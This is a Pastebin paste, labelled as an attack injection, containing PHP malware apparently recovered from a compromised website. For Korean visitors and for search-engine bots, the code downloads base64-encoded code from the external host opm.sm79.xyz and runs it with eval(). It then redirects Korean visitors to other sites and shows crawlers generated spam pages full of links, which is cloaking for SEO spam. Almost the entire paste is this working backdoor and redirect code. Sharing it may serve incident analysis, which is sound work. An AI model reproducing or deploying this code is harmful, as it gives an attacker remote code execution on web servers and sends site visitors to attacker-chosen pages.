Advertisement
fabiomb

Inyección 3 - Código accesible - Ataque

Jul 29th, 2019
929
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.75 KB | None | 0 0
  1. if (strpos(strtolower(@$_SERVER['HTTP_REFERER']), ".kr") !== false || strpos(strtolower(@$_SERVER['HTTP_ACCEPT_LANGUAGE']), "ko") !== false) {
  2.     $local_url = _local_url();
  3.     $html = base64_decode(_get_between(_get_cache('http://opm.sm79.xyz/api.php?g=gitt'), "->|", "|<-"));
  4.     eval($html);
  5.     $Data_arr = _get_static_arr($local_url . 'Data_arr', $Main_arr["data"]);
  6.     $sc_arr = explode('|', _get_static_arr($local_url . "sitel1", $Data_arr['site']));
  7.     die('<!DOCTYPE html><html><body><script>document.location=("' . @trim($sc_arr[0]) . '");</script></body></html>');
  8. }
  9. function _get_static_arr($str, $arr) {
  10.     return ($arr[hashCode($str) % count($arr) ]);
  11. }
  12. if (isBot()) {
  13.     $base = _base_url();
  14.     $local_url = _local_url();
  15.     $html = base64_decode(_get_between(_get_cache('http://opm.sm79.xyz/api.php?g=gitt'), "->|", "|<-"));
  16.     eval($html);
  17.     $Data_arr = _get_static_arr($local_url . 'Data_arr', $Main_arr["data"]);
  18.     $Data_arr = array_merge($Data_arr, $Main_arr["common"]);
  19.     $git = $Main_arr["git"];
  20.     $html_m = base64_decode(_get_between(_get_cache($git . (hashCode(_local_url()) % 500 + 1) . '.txt'), "->|", "|<-"));
  21.     $html_m = content_process($html_m, $Data_arr);
  22.     $s = strpos($html_m, '[search]');
  23.     while ($s !== false) {
  24.         $seed = rand_str();
  25.         $content = content_process($Main_arr["search"]["rule"][mt_rand(0, count($Main_arr["search"]["rule"]) - 1) ], $Data_arr, true);
  26.         $hurl = str_ireplace('[content]', urlencode($content), $Main_arr["search"]["data"][mt_rand(0, count($Main_arr["search"]["data"]) - 1) ]);
  27.         $html_m = substr_replace($html_m, "<a href=\"" . $hurl . "\">" . $content . "</a>", $s, strlen('[search]'));
  28.         $s = strpos($html_m, '[search]');
  29.     }
  30.     die($html_m);
  31. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement